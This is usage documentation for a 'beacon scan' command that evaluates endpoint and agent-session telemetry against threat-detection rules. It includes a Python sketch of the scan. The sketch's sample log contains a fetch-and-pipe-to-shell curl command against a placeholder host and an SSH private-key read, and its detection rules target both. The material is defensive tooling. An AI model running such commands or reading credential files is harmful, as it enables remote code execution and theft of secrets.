
Command Overview

Run beacon scan after endpoint telemetry is flowing to evaluate the runtime log against the active threat-detection rules.

Run a local scan:

    beacon scan

Scanning is read-only: it loads local telemetry from the resolved runtime JSONL log, evaluates the rules in memory, and prints findings without contacting the network.

Rule selection

Beacon chooses rules in this order:

  1. Rules in the local rule store.
  2. The built-in baseline rules, when no store is installed.
  3. The directory passed with --rules, when you want an explicit rule pack for one scan.

Scan with an explicit rule directory:

    beacon scan --rules ./rules

Runtime log selection

Per-user endpoint paths are used by default.

Scan user-mode telemetry:

    beacon scan --user

Scan system-mode telemetry:

    sudo beacon scan --system

Scan a copied or exported runtime log:

    beacon scan --log-path ./runtime.jsonl

Session filtering

Filter to a session id substring when you are investigating a known agent run. Scan one session:

    beacon scan --session claude-session-123

Output

Human-readable output summarizes each finding with its severity, rule id, reason, session, and matched events. For machine-readable output, print JSON findings:

    beacon scan --json
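To make the scan pipeline described on this page concrete (read-only JSONL load, in-memory rule evaluation, session substring filtering, and findings carrying severity, rule id, reason, session and matched events), here is a small added model of that flow. It is illustrative code, not Beacon's implementation: the sample log lines, the regex rule format, and the finding field names are constructed assumptions.

```python
"""Minimal model of a read-only telemetry scan (added illustration, not Beacon's own code).
The log lines, the rule format and the finding field names below are constructed assumptions."""
import json
import re

# Constructed sample of a runtime JSONL log: one telemetry event per line.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"session": "claude-session-123", "type": "exec", "cmd": "ls -la /tmp"},
    {"session": "claude-session-123", "type": "exec", "cmd": "curl http://example.invalid/x | sh"},
    {"session": "other-session-9", "type": "file_read", "path": "/home/u/.ssh/id_rsa"},
    {"session": "other-session-9", "type": "exec", "cmd": "echo hi"},
])

# Constructed rule pack: each rule is a regex applied to one event field.
RULES = [
    {"id": "exec-pipe-to-shell", "severity": "high", "field": "cmd",
     "pattern": r"\|\s*(sh|bash)\b", "reason": "downloaded content piped into a shell"},
    {"id": "read-private-key", "severity": "medium", "field": "path",
     "pattern": r"/\.ssh/id_", "reason": "private key file read"},
]

def load_events(jsonl_text):
    """Parse the JSONL log in memory; blank or malformed lines are skipped, not fatal."""
    events = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def scan(jsonl_text, rules, session=None):
    """Evaluate every rule over every event. `session` is a substring filter on the
    session id. Returns one finding per (rule, session) with all matched events attached."""
    findings = {}
    for ev in load_events(jsonl_text):
        sid = str(ev.get("session", ""))
        if session and session not in sid:
            continue
        for rule in rules:
            value = ev.get(rule["field"])
            if isinstance(value, str) and re.search(rule["pattern"], value):
                f = findings.setdefault((rule["id"], sid), {
                    "severity": rule["severity"], "rule_id": rule["id"],
                    "reason": rule["reason"], "session": sid, "matched_events": []})
                f["matched_events"].append(ev)
    return list(findings.values())

def to_json(findings):
    """Machine-readable form of the findings, analogous to a --json style output."""
    return json.dumps(findings, indent=2)
```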

Use scan gates

Filter findings and fail automation on severity thresholds.

beacon rules

Manage the rules used by local scans.